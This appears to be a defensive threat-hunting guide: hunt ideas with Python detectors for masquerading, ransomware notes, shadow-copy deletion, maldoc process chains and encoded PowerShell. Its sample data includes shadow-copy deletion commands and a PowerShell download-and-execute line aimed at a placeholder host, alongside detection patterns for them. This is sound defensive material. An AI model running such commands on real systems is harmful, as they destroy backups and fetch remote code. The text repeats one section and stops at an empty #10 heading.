Hunting

Threat hunting is often referred to as a semi-scientific practice. This is because hunters will deploy hunts based on a hypothesis, collect evidence, and document their findings — all of which should stir (hopefully) fond memories of grade 9 science class. And just like in high school, the hardest part of the scientific process (and threat hunting) is often coming up with an idea to test scientifically.

Threat hunting must be iterative. A hunt (the commonly accepted term for activity carried out by these teams) has value in its execution, but only for the duration of its execution. Once the hunt is complete, any subsequent malicious activity may remain unidentified. Therefore, hunts need to be carried out in an iterative fashion based on the prevalence of the technique, and the relative risk to the organization.

Threat hunting must be proactive. The objective of threat hunting is, ultimately, to identify previously undetected malicious activity in an environment. This objective is accomplished through a variety of analysis methods, especially those involving behavioral and statistical analysis. This process, however, absolutely does not rely on searching through an environment using atomic indicators of compromise (IOC). That practice belongs strictly to the domain of traditional security operations, not threat hunting.

Hunting Methodologies

Threat hunters assume that adversaries are already in the system, and they initiate investigation to find unusual behavior that may indicate the presence of malicious activity. In proactive threat hunting, this initiation of investigation typically falls into three main categories:

Hypothesis-driven investigation

Hypothesis-driven investigations are often triggered by a new threat that’s been identified through a large pool of crowdsourced attack data, giving insights into attackers’ latest tactics, techniques, and procedures (TTP). Once a new TTP has been identified, threat hunters will then look to discover if the attacker’s specific behaviors are found in their own environment.

Investigation based on known Indicators of Compromise or Indicators of Attack

This approach to threat hunting involves leveraging tactical threat intelligence to catalog known IOCs and IOAs associated with new threats. These then become triggers that threat hunters use to uncover potential hidden attacks or ongoing malicious activity.

Advanced analytics and machine learning investigations

The third approach combines powerful data analysis and machine learning to sift through a massive amount of information in order to detect irregularities that may suggest potential malicious activity. These anomalies become hunting leads that are investigated by skilled analysts to identify stealthy threats.

All three approaches are a human-powered effort that combines threat intelligence resources with advanced security technology to proactively protect an organization’s systems and information.

Threat Hunting Steps

The process of proactive cyber threat hunting typically involves three steps: a trigger, an investigation and a resolution.

Step 1: The Trigger

A trigger points threat hunters to a specific system or area of the network for further investigation when advanced detection tools identify unusual actions that may indicate malicious activity. Often, a hypothesis about a new threat can be the trigger for proactive hunting. For example, a security team may search for advanced threats that use tools like fileless malware to evade existing defenses.

Step 2: Investigation

During the investigation phase, the threat hunter uses technology such as EDR (Endpoint Detection and Response) to take a deep dive into potential malicious compromise of a system. The investigation continues until either the activity is deemed benign or a complete picture of the malicious behavior has been created.

Step 3: Resolution

The resolution phase involves communicating relevant malicious activity intelligence to operations and security teams so they can respond to the incident and mitigate threats. The data gathered about both malicious and benign activity can be fed into automated technology to improve its effectiveness without further human intervention.

Throughout this process, cyber threat hunters gather as much information as possible about an attacker’s actions, methods and goals. They also analyze collected data to determine trends in an organization’s security environment, eliminate current vulnerabilities and make predictions to enhance security in the future.

What is a Hunting Hypothesis?

Before we dive into the list, though, we first need to answer the question “what is a threat hunting hypothesis?”

A hypothesis is a “…tentative assumption made in order to draw out and test its logical or empirical consequences.” A threat hunting hypothesis is similar: it is a proposition regarding a tactic, technique, or procedure, often derived from threat intelligence, security research, or an individual hunter’s experience or intuition, which is tentatively assumed to be correct until a hunt can be carried out to either conclusively prove or disprove its validity.

While there is no set “format” for a threat hunting hypothesis to take, many hunters will try to keep a standard format for their hunts.

Hunting Ideas

#1: LOOK FOR EXPLOITATION OF HIGH VALUE VULNERABILITIES

One of the easiest threat hunting ideas is to simply look for behaviors that align with active exploitation of high-profile or high-value vulnerabilities. This works because adversaries often rely heavily on specific vulnerabilities that they know how to exploit proficiently. A great example of this is CVE-2021–40444:

MICROSOFT WORD LAUNCHING CONTROL PANEL PROCESS — POTENTIAL CVE-2021–40444 EXPLOIT

Microsoft Word suffered from a zero-day attack in September 2021, tracked as CVE-2021–40444. The vulnerability allowed code execution by Microsoft Word without the need for a macro to run. A malicious Word document containing a configuration to load malicious code from a website allowed an attacker to download and execute a payload without user interaction once the document is opened. The exploit observed in the wild utilized the Control Panel executable (control.exe) to load DLL files masked as INF files from one of several directories. This is abnormal behavior, as such commands are typically related to installing file system filter drivers and are not something Microsoft Word commonly performs.

#2: LOOK FOR MASQUERADING

Another quick win that hunt teams can focus on is to look for masquerading. Most often, adversaries and malware will try to blend in with the background activity on the compromised system. This means that they may try to masquerade their processes by using legitimate-sounding process names. A common example that has been used widely is Microsoft Defender.

PROCESS MASQUERADING AS MICROSOFT MALWARE PROTECTION ENGINE

The Microsoft Malware Protection engine resides in the C:\Program Files\Windows Defender\ or C:\ProgramData\Microsoft\Windows Defender\ folders. All legitimate executions of the application should be spawned from these locations. This package identifies any outliers that are not executed from these normal folders, indicating a process is masquerading as the legitimate Microsoft Malware Protection Engine.
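The hunt described above reduces to a path check, but a naive prefix comparison has holes. The following is an added example (not code from the original page or from any hunt package it describes) that applies the check to constructed process-creation events; the allowed folders are the two named above, and the engine image name MsMpEng.exe is assumed. Path normalization is what closes the `..` traversal and look-alike-folder cases:

```python
import ntpath

# Folders the legitimate Microsoft Malware Protection Engine runs from, taken from
# the section above. Subfolders (e.g. Platform\<version> under ProgramData) are
# accepted because the check allows anything beneath these roots.
ALLOWED_DEFENDER_DIRS = (
    r"C:\Program Files\Windows Defender",
    r"C:\ProgramData\Microsoft\Windows Defender",
)

# Image name of the engine service binary (assumed for this example).
DEFENDER_IMAGE_NAMES = {"msmpeng.exe"}


def normalize(path: str) -> str:
    """Collapse '..' segments and lower-case the path so directory-traversal tricks
    and case differences cannot slip past the prefix comparison."""
    return ntpath.normpath(path).lower().rstrip("\\")


def is_under(path: str, directory: str) -> bool:
    """True if path is located in directory or one of its subfolders.
    The separator is appended so 'Windows Defender Fake' does not match."""
    p, d = normalize(path), normalize(directory)
    return p == d or p.startswith(d + "\\")


def is_masquerading(image_path: str) -> bool:
    """Flag a process whose file name is the engine's but whose folder is not one
    of the folders the real engine runs from."""
    if ntpath.basename(image_path).lower() not in DEFENDER_IMAGE_NAMES:
        return False
    return not any(is_under(image_path, d) for d in ALLOWED_DEFENDER_DIRS)


def hunt(process_events):
    """Return the process-creation events whose image path looks like masquerading."""
    return [e for e in process_events if is_masquerading(e["image"])]


# Constructed sample process-creation events (pid and image path only).
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MsMpEng.exe"},
    {"pid": 1002, "image": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"pid": 1003, "image": r"C:\Users\Public\MsMpEng.exe"},                               # wrong folder
    {"pid": 1004, "image": r"C:\Program Files\Windows Defender\..\..\Temp\msmpeng.exe"},  # traversal trick
    {"pid": 1005, "image": r"C:\Program Files\Windows Defender Fake\MsMpEng.exe"},       # look-alike folder
    {"pid": 1006, "image": r"C:\Windows\System32\svchost.exe"},                           # unrelated process
]

if __name__ == "__main__":
    for e in hunt(SAMPLE_EVENTS):
        print(f"pid {e['pid']}: {e['image']}")
```

Events 1003, 1004 and 1005 are the outliers; the first two are the engine in its normal locations and the last is an unrelated binary. In a real hunt the `image` field comes from your EDR's process-creation telemetry.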

#3: LOOK FOR SUSPICIOUS USE OF ONLINE SERVICES

Another high-fidelity threat hunting idea is to look for activity relating to the use of suspicious or prohibited online services. These services are often used to help an actor bring their tools into an environment, but they can also serve as a method of data exfiltration.

DROPBOX API USAGE — ATTEMPTED DOWNLOAD/UPLOAD

Identify the usage of DropBox’s HTTP API via URL string. While the DropBox API may be very common, observing an upload/download of a PDF file from a temp directory specifically could be indicative of activity related to Nobelium (UNC2452) reported in May 2021. Nobelium’s BoomBox downloader utilized the DropBox API over HTTP to send machine information and download another payload which is then saved to a folder within the user’s AppData directory and launched with rundll32.exe.

POWERSHELL PASTEBIN DOWNLOAD

This threat abuses PowerShell commands to potentially download and execute code hosted on normally benign sources such as Pastebin, GitHub, and similar services. This particular method has been utilized by the REvil ransomware campaign and is a method of malware distribution that can be obscured by the trust given to well-known sites.
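Both hunts above are questions asked of web-request telemetry: which process talked to which host, and what file was involved. The following is an added example (not code from the original page) that runs both over constructed request events. The Dropbox API host names, the paste-site host list, and the event field layout (`process`, `url`, optional `file`) are assumptions; the PDF-from-a-temp-directory refinement comes from the Dropbox section:

```python
import re
from urllib.parse import urlparse

# Hosts for Dropbox's HTTP API and for the paste/code-hosting sites named in the
# section. Assumed host lists for this example; extend them to match your policy.
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
PASTE_HOSTS = {"pastebin.com", "raw.githubusercontent.com", "gist.githubusercontent.com"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Matches a temp directory segment in a Windows path (e.g. ...\AppData\Local\Temp\...).
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)


def classify(event):
    """Return hunt-lead labels for one web-request event ([] when nothing matched).

    event fields: process (image path of the requesting process), url, and an
    optional file (local file tied to the upload/download, as an EDR may record).
    """
    host = (urlparse(event["url"]).hostname or "").lower()
    proc_name = event["process"].rsplit("\\", 1)[-1].lower()
    leads = []
    if host in DROPBOX_API_HOSTS:
        local = event.get("file", "")
        # Dropbox API traffic is common; a PDF moving through a temp directory is the
        # specific pattern the section calls out, so it gets the stronger label.
        if local.lower().endswith(".pdf") and TEMP_DIR_RE.search(local):
            leads.append("dropbox-api-pdf-from-temp")
        else:
            leads.append("dropbox-api")
    if host in PASTE_HOSTS and proc_name in POWERSHELL_IMAGES:
        leads.append("powershell-paste-site-download")
    return leads


def hunt(events):
    """Return (event, leads) pairs for every event that produced at least one lead."""
    results = []
    for event in events:
        leads = classify(event)
        if leads:
            results.append((event, leads))
    return results


# Constructed sample events. Paste IDs and file names are placeholders.
SAMPLE_EVENTS = [
    {"process": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "url": "https://content.dropboxapi.com/2/files/upload",
     "file": r"C:\Users\alice\AppData\Local\Temp\invoice.pdf"},
    {"process": r"C:\Program Files\SyncClient\sync.exe",
     "url": "https://content.dropboxapi.com/2/files/download",
     "file": r"C:\Users\alice\Documents\notes.docx"},
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "url": "https://pastebin.com/raw/PLACEHOLDER"},
    {"process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "url": "https://pastebin.com/raw/PLACEHOLDER"},
    {"process": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "url": "https://outlook.office.com/mail/"},
]

if __name__ == "__main__":
    for event, leads in hunt(SAMPLE_EVENTS):
        print(f"{event['process'].rsplit(chr(92), 1)[-1]} -> {event['url']}: {leads}")
```

The browser hitting Pastebin and the mail client hitting Office 365 produce no lead; the ordinary Dropbox download is returned with the weaker `dropbox-api` label so it can be triaged by volume rather than investigated one by one.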

#4: LOOK FOR SUSPICIOUS USE OF THE REGISTRY

A great place to start a hunt is by looking at the registry. A lot of adversaries and malware use the registry for persistence, especially the CurrentVersion registry key. If you are looking for evidence of adversarial activity, the Windows Registry is a great place to start.

ATTEMPTED VBSCRIPT STORED IN NON-RUN CURRENTVERSION REGISTRY KEY VALUE

Identify a potential new registry key name that is a non-autorun and non-Run key in the HKLM\Software\Microsoft\Windows\CurrentVersion\ registry key, containing VBScript in the key value. The Windows Registry is a database of settings used by Microsoft Windows system applications and core utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system function, or establish persistence, among other reasons. The “CurrentVersion” registry key in either the HKCU (Current User) or the HKLM (Local Machine) hive is one of the most abused registry keys, more specifically the Run key within CurrentVersion. Because of this, the Run key is heavily scrutinized by detection and prevention tools. The targeted technique in this package utilizes only the CurrentVersion key to add the malware’s configuration information and potentially establish persistence. This is most likely due to the Run key’s heavy scrutiny by defense tools.

#5: LOOK FOR SUSPICIOUS BEHAVIORS

It may sound a bit like a tautology, but another great way to start hunting is to look for suspicious behaviors. Things like excessive file writes or file modifications can be a give-away for ransomware activity on a system. You can also look for files with highly unusual file extensions.

EXCESSIVE FILE WRITE OR MODIFICATIONS WITH COMMON RANSOMWARE NOTE EXTENSIONS

Ransomware notes are generally dropped in common paths, such as a user’s Desktop, so they are more visible, using image files, .txt files and/or .doc files as the medium to communicate. Attackers will also leave these ransomware notes in every folder or directory they choose to encrypt. This threat focuses on these notes being dropped excessively, which is potentially indicative of ransomware activity.

Multiple ransomware variants drop a ransom note in each folder they encrypt, once all the files within the folder have been encrypted. The logic provided looks for the common file extensions utilized by ransomware for their notes and sets a threshold of at least 20 unique folders where the same file is created or modified.
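The threshold logic above is easy to get wrong: counting events instead of distinct folders turns a log file rewritten in place into a false positive. The following is an added example (not the page's or any vendor's hunt package) implementing the rule over constructed file-activity events. The extension set is the one the section names (text, Office document, image files); the event layout (`host`, `action`, `path`) and the sample file names are assumptions:

```python
from collections import defaultdict
import ntpath

# Extensions the section names for ransom notes: text, Office document and image files.
NOTE_EXTENSIONS = {".txt", ".doc", ".png", ".jpg", ".bmp"}
# Threshold from the section: the same file created/modified in at least 20 unique folders.
FOLDER_THRESHOLD = 20


def folders_per_note(file_events):
    """Map (host, file name) -> set of distinct folders the file was written to,
    considering only create/modify events with note-like extensions.

    Counting distinct folders (not events) separates a note dropped across a
    directory tree from one file rewritten many times in place."""
    folders = defaultdict(set)
    for ev in file_events:
        if ev["action"] not in ("create", "modify"):
            continue
        directory, name = ntpath.split(ev["path"])
        if ntpath.splitext(name)[1].lower() not in NOTE_EXTENSIONS:
            continue
        folders[(ev["host"], name.lower())].add(directory.lower())
    return folders


def hunt(file_events, threshold=FOLDER_THRESHOLD):
    """Return {(host, file name): folder count} for names at or above the threshold."""
    return {key: len(dirs)
            for key, dirs in folders_per_note(file_events).items()
            if len(dirs) >= threshold}


def make_sample_events():
    """Constructed sample: WS01 has one note name written to 25 folders; WS02 rewrites
    a status file 25 times in one folder; WS03 has a note-like name in only 5 folders."""
    events = []
    for i in range(25):
        events.append({"host": "WS01", "action": "create",
                       "path": rf"C:\Users\bob\Documents\project{i}\README_TO_RESTORE.txt"})
        events.append({"host": "WS02", "action": "modify",
                       "path": r"C:\ProgramData\Agent\status.txt"})
    for i in range(5):
        events.append({"host": "WS03", "action": "create",
                       "path": rf"C:\Users\carol\Desktop\folder{i}\notes.txt"})
    events.append({"host": "WS01", "action": "create",
                   "path": r"C:\Users\bob\Documents\project0\budget.xlsx"})
    return events


if __name__ == "__main__":
    for (host, name), count in hunt(make_sample_events()).items():
        print(f"{host}: {name} written to {count} folders")
```

Only WS01 crosses the threshold. Lowering `threshold` to 5 would also surface WS03, which is the knob to turn when hunting smaller shares or single-user machines.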

#6: LOOK FOR SUSPICIOUS BEHAVIORS INVOLVING LOLBINS

One of the biggest trends amongst adversaries these days is their growing use of so-called “living-off-the-land” binaries (or LOLBins). These allow actors to carry out activities while avoiding detection by various security platforms through the use of native Windows applications. One example of this is using built-in utilities to delete volume shadow copies (or VSC) in order to prevent restoration.

SHADOW COPIES DELETION USING OPERATING SYSTEMS UTILITIES

Volume Shadow Copy Service is a framework provided in Microsoft Windows operating systems to perform volume backups or to create consistent, point-in-time copies of data (known as shadow copies). Due to the features that Volume Shadow Copies provide, such as the ability to roll back to a specific point-in-time copy of an NTFS volume, the copies are often targeted by malware. Nearly every ransomware variant ensures destruction of Volume Shadow Copy (VSC) backups, so that the infected user cannot easily restore their encrypted files. Similarly, VSC backups have also been observed being targeted by wiper malware variants (such as the “Olympic Destroyer” malware, which targeted the 2018 Winter Olympics in PyeongChang, South Korea), as well as loader malware variants (such as the H1N1 Trojan Downloader).
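The hunt above is a command-line match on the built-in utilities that manage shadow copies, with the parent process kept for triage. The following is an added example (not code from the original page) that runs such a match over constructed process-creation events. The pattern set (vssadmin, wmic, and the PowerShell WMI class `Win32_ShadowCopy`) and the event layout (`pid`, `parent`, `cmdline`) are assumptions:

```python
import re

# Command-line patterns for shadow-copy destruction through built-in utilities.
# Assumed pattern set for this example; extend it as your telemetry shows new variants.
SHADOW_DELETE_PATTERNS = [
    ("vssadmin-delete-shadows",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)),
    ("wmic-shadowcopy-delete",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.IGNORECASE)),
    ("powershell-win32_shadowcopy-remove",
     re.compile(r"win32_shadowcopy.*\b(delete|remove)\b", re.IGNORECASE)),
]


def classify_command(cmdline: str):
    """Return the label of the first matching pattern, or None.
    Matching is case-insensitive and tolerates a missing .exe suffix, since both
    vary freely in real command lines."""
    for label, pattern in SHADOW_DELETE_PATTERNS:
        if pattern.search(cmdline):
            return label
    return None


def hunt(process_events):
    """Return (event, label) for each process-creation event whose command line
    matches. The parent image stays attached to the event so an analyst can tell a
    backup agent's scheduled cleanup from a command issued by a freshly dropped binary."""
    leads = []
    for ev in process_events:
        label = classify_command(ev["cmdline"])
        if label:
            leads.append((ev, label))
    return leads


# Constructed sample events. The parent path in 4101/4103 is a placeholder for an
# unknown, user-writable binary.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": r"C:\Users\bob\Downloads\PLACEHOLDER.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 4102, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"pid": 4103, "parent": r"C:\Users\bob\Downloads\PLACEHOLDER.exe",
     "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"'},
    {"pid": 4104, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "vssadmin list shadows"},                      # read-only, not a lead
    {"pid": 4105, "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for ev, label in hunt(SAMPLE_EVENTS):
        print(f"pid {ev['pid']} [{label}] parent={ev['parent']}")
```

Listing shadow copies (4104) is not flagged; only the three destructive forms are. Pairing each lead with the parent image is what turns a noisy rule into a hunt: a command issued from a user's Downloads folder reads very differently from the same command issued by a backup service.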

#7 — Potential Maldoc Execution Chain

Level of Complexity: Easy

Hypothesis: Maldocs (Malware Documents) are malicious documents containing self-executing code or code that requires a user to grant permission or interact with the document before execution. Maldocs are mostly delivered to users via phishing emails. In many cases the user will be required to interact with the document prior to any code executing successfully. Once the document is opened and any required user interaction has been performed, malicious code will execute, such as PowerShell, cmd shell or similar scripting code to establish communication with the attacker’s infrastructure, download a payload or perform local actions such as persistence or sleep until a later time.
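Both idea #1 (Word spawning control.exe with an INF file) and this maldoc execution chain are questions about process lineage, and the chain often has an intermediate cmd.exe between the Office application and the script host. The following is an added example (not code from the original page) that walks the parent chain over constructed process-creation events and labels both patterns. The Office application set, the script-host set, and the event layout (`pid`, `ppid`, `image`, `cmdline`) are assumptions; the `.inf` file name in the sample is a placeholder:

```python
import ntpath

# Office applications whose descendants are of interest (assumed set).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins a maldoc chain typically lands in (assumed set).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def lineage(event, by_pid, max_depth=4):
    """Image names from this process upward through its ancestors (closest first).
    Walking more than one level catches winword -> cmd -> powershell, where the
    direct parent of powershell is cmd rather than the Office application."""
    chain = [image_name(event["image"])]
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ppid"])
        if parent is None:
            break
        chain.append(image_name(parent["image"]))
        current = parent
    return chain


def classify(event, by_pid):
    """Return a lead label when an Office ancestor is present and the process is
    control.exe with an .inf argument (the CVE-2021-40444 pattern from idea #1) or a
    script host / LOLBin (the maldoc execution chain); otherwise None."""
    chain = lineage(event, by_pid)
    if not any(name in OFFICE_APPS for name in chain[1:]):
        return None
    name = chain[0]
    cmdline = event.get("cmdline", "").lower()
    if name == "control.exe" and ".inf" in cmdline:
        return "office->control.exe loading .inf (potential CVE-2021-40444)"
    if name in SCRIPT_HOSTS:
        return "office->script host / LOLBin (potential maldoc chain)"
    return None


def hunt(process_events):
    """Return (pid, lineage, label) for every flagged process-creation event."""
    by_pid = {e["pid"]: e for e in process_events}
    leads = []
    for ev in process_events:
        label = classify(ev, by_pid)
        if label:
            leads.append((ev["pid"], lineage(ev, by_pid), label))
    return leads


# Constructed sample process tree for one workstation.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docx"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},                      # print helper: Office child, but benign
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r"control.exe C:\Users\alice\AppData\Local\Temp\PLACEHOLDER.inf"},
    {"pid": 203, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden"},
    {"pid": 204, "ppid": 203, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},                                 # user-launched shell, no Office ancestor
]

if __name__ == "__main__":
    for pid, chain, label in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: {' <- '.join(chain)}  [{label}]")
```

The print helper (201) is an Office child but not a script host, so it is not flagged; the user's own cmd.exe (300) has no Office ancestor. The powershell.exe at 204 is caught only because the lineage walk looks past its direct parent.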

#8 — PowerShell Encoded Command Execution

Level of Complexity: Easy

Hypothesis: Once a moderately skilled attacker has gained initial access to a system, they are likely to employ tools that reside on the system to carry out their attack, or to use as a means of ingress for other tools. This is because these native tools are less likely to be caught by traditional threat detection platforms, and their use is unlikely to raise much attention. This is especially true for tools such as PowerShell that enable an attacker to carry out a number of attacks. In an effort to further obfuscate their PowerShell activity, attackers will likely use the EncodedCommand parameter to encode commands and arguments and prevent simple string matching. Use of the EncodedCommand PowerShell parameter should be investigated.
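Hunting for the encoded form means two things: recognizing the parameter under its accepted abbreviations (powershell.exe accepts any unambiguous prefix of `-EncodedCommand`, plus `-ec`), and decoding the payload, which is base64 over UTF-16LE rather than over UTF-8. The following is an added example (not code from the original page) that does both over constructed command lines. The keyword list used to rank the decoded scripts is an assumption, and the URL in the sample is a placeholder:

```python
import base64
import re

# "-<param> <value>" where the value is made only of base64 characters.
PARAM_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{4,})")

# Strings in a decoded script that usually justify a closer look. Assumed list.
KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest",
            "invoke-expression", "iex", "frombase64string")


def is_encoded_param(name: str) -> bool:
    """powershell.exe accepts -e, -en, -enc, ... -encodedcommand, and also -ec, so
    compare against the full name rather than one fixed spelling."""
    name = name.lower()
    return name in ("e", "ec") or (len(name) >= 2 and "encodedcommand".startswith(name))


def extract_encoded(cmdline: str):
    """Return the base64 argument handed to -EncodedCommand, or None."""
    for m in PARAM_RE.finditer(cmdline):
        if is_encoded_param(m.group(1)):
            return m.group(2)
    return None


def decode_encoded(b64: str):
    """Decode the UTF-16LE script PowerShell expects; None if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def hunt(cmdlines):
    """For each command line using an encoded command, return the raw base64, the
    decoded script (None when it does not decode) and the keyword hits."""
    leads = []
    for cmd in cmdlines:
        b64 = extract_encoded(cmd)
        if b64 is None:
            continue
        script = decode_encoded(b64)
        hits = [k for k in KEYWORDS if script and k in script.lower()]
        leads.append({"cmdline": cmd, "encoded": b64, "decoded": script, "hits": hits})
    return leads


def encode_like_powershell(script: str) -> str:
    """Produce the argument the way PowerShell expects it (UTF-16LE, then base64).
    Used here only to construct the sample command lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines; the URL is a placeholder.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc "
    + encode_like_powershell('IEX (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/stage.ps1")'),
    "powershell -ec " + encode_like_powershell("Get-Process"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell -e NotBase64!!",          # parameter present, payload does not decode
]

if __name__ == "__main__":
    for lead in hunt(SAMPLE_CMDLINES):
        print(f"hits={lead['hits']} decoded={lead['decoded']!r}")
```

The third sample uses `-ExecutionPolicy`, which is not a prefix of `EncodedCommand` and is correctly ignored. The fourth is still returned as a lead with `decoded` set to `None`: an encoded-command parameter whose payload does not decode is itself worth a look.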

#9 — Attempted VBScript Stored in Non-Run CurrentVersion Registry Key Value

Level of Complexity: Medium

The Windows Registry is a database of settings used by Microsoft Windows system applications and core utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system function, or establish persistence, among other reasons. The “CurrentVersion” registry key in either the HKCU (Current User) or the HKLM (Local Machine) hive is one of the most abused registry keys, more specifically the Run key within CurrentVersion. Because of this, the Run key is heavily scrutinized by detection and prevention tools. The targeted technique in this package utilizes only the CurrentVersion key to add the malware’s configuration information and potentially establish persistence. This is most likely due to the Run key’s heavy scrutiny by defense tools.
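Idea #4 and this entry describe the same hunt: values under CurrentVersion, outside the Run-family keys, whose data looks like VBScript. The following is an added example (not code from the original page or from any hunt package) that scores constructed registry value records against a small set of VBScript markers and handles the case where the script is stored in a binary value as UTF-16LE. The marker list, the score threshold, and the record layout (`hive`, `key`, `name`, `data`) are assumptions; the key names under CurrentVersion in the sample are placeholders:

```python
import re

# Autorun keys directly under CurrentVersion that this hunt deliberately skips
# (they are already heavily scrutinized, as the section notes).
RUN_FAMILY = {"run", "runonce", "runonceex", "runservices", "runservicesonce"}
CURRENTVERSION = "software\\microsoft\\windows\\currentversion"

# Markers that together indicate VBScript rather than an ordinary setting string.
# Assumed marker list; one marker alone is weak evidence, hence the score threshold.
VBSCRIPT_MARKERS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bCreateObject\s*\(",
    r"WScript\.Shell",
    r"\bExecuteGlobal\b|\bExecute\s*\(",
    r"\bSet\s+\w+\s*=",
    r"\bDim\s+\w+",
    r"\bEnd\s+(Sub|Function|If)\b",
    r"\bMsgBox\b",
    r"\bOn\s+Error\s+Resume\s+Next\b",
)]


def value_to_text(data) -> str:
    """Registry data may be REG_SZ (str) or REG_BINARY (bytes); script hidden in a
    binary value is often UTF-16LE, which shows up as a NUL in every second byte."""
    if isinstance(data, bytes):
        if len(data) >= 2 and data[1:2] == b"\x00":
            return data.decode("utf-16-le", errors="replace")
        return data.decode("latin-1")
    return str(data)


def is_non_run_currentversion(key_path: str) -> bool:
    """True for keys at or under ...\\CurrentVersion whose first subkey is not a
    Run-family key (a value placed directly under CurrentVersion also qualifies)."""
    path = key_path.strip("\\").lower()
    if path != CURRENTVERSION and not path.startswith(CURRENTVERSION + "\\"):
        return False
    rest = path[len(CURRENTVERSION):].strip("\\")
    return not rest or rest.split("\\", 1)[0] not in RUN_FAMILY


def vbscript_score(text: str) -> int:
    """Number of distinct VBScript markers present in the text."""
    return sum(1 for marker in VBSCRIPT_MARKERS if marker.search(text))


def hunt(registry_values, min_score=2):
    """Return (full key path, value name, score) for values in non-Run CurrentVersion
    keys whose data scores at least min_score."""
    leads = []
    for v in registry_values:
        if not is_non_run_currentversion(v["key"]):
            continue
        score = vbscript_score(value_to_text(v["data"]))
        if score >= min_score:
            leads.append((v["hive"] + "\\" + v["key"], v["name"], score))
    return leads


# Constructed sample registry value records.
SAMPLE_VALUES = [
    {"hive": "HKLM", "key": r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "OneDrive", "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"hive": "HKLM", "key": r"SOFTWARE\Microsoft\Windows\CurrentVersion\PLACEHOLDER_KEY",
     "name": "cfg", "data": 'Set sh = CreateObject("WScript.Shell"): sh.Run "PLACEHOLDER"'},
    {"hive": "HKCU", "key": r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "name": "Hidden", "data": 1},
    {"hive": "HKLM", "key": r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PLACEHOLDER_APP",
     "name": "DisplayName", "data": "Dim Sum Recipe Manager"},      # one marker: below threshold
    {"hive": "HKCU", "key": r"Software\Microsoft\Windows\CurrentVersion\PLACEHOLDER_KEY2",
     "name": "blob", "data": 'Dim o: Set o = CreateObject("WScript.Shell")'.encode("utf-16-le")},
    {"hive": "HKLM", "key": r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "name": "Shell", "data": "explorer.exe"},                        # different CurrentVersion key
]

if __name__ == "__main__":
    for key, name, score in hunt(SAMPLE_VALUES):
        print(f"{key} -> {name} (score {score})")
```

The Run value is skipped by design, the Uninstall entry scores one marker and stays below the threshold, and the UTF-16LE binary blob is decoded before scoring. On a live system the records would come from a registry export or an EDR's registry telemetry.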

#10 — Cobalt Strike Beacon Default C2 Structure

Level of Complexity: Medium

